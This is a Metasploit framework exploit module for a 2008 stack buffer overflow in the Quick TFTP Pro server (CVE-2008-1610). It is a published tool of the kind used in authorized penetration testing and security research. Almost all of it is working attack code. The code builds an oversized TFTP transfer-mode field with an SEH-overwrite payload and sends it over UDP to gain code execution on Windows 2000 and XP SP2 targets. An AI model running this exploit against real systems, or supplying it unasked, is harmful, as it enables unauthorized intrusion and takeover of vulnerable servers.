##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Quick FTP Pro 2.1 Transfer-Mode Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the Quick TFTP Pro server
          product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting
          in a DoS.  This is a port of a sploit by Mati "muts" Aharoni.
        },
        'Author' => 'Saint Patrick',
        'References' => [
          ['CVE', '2008-1610'],
          ['OSVDB', '43784'],
          ['BID', '28459'],
          ['URL', 'http://web.archive.org/web/20080330000001/http://secunia.com:80/advisories/29494/'],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          'Space' => 460,
          'BadChars' => "\x00\x20\x0a\x0d",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          ['Windows Server 2000', { 'Ret' => 0x75022AC4 } ], # ws2help.dll
          ['Windows XP SP2', { 'Ret' => 0x74D31458 } ], # oledlg.dll
        ],
        'DefaultTarget' => 1,
        'DisclosureDate' => '2008-03-27',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(69)
      ]
    )
  end

  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    sploit = "\x00\x02" + rand_text_english(4, payload_badchars) + "\x00"
    sploit += "A" * 1019
    seh = generate_seh_payload(target.ret)
    sploit += seh
    sploit += "\x00"

    udp_sock.put(sploit)
    print_status("Done.")

    handler
    disconnect_udp
  end
end
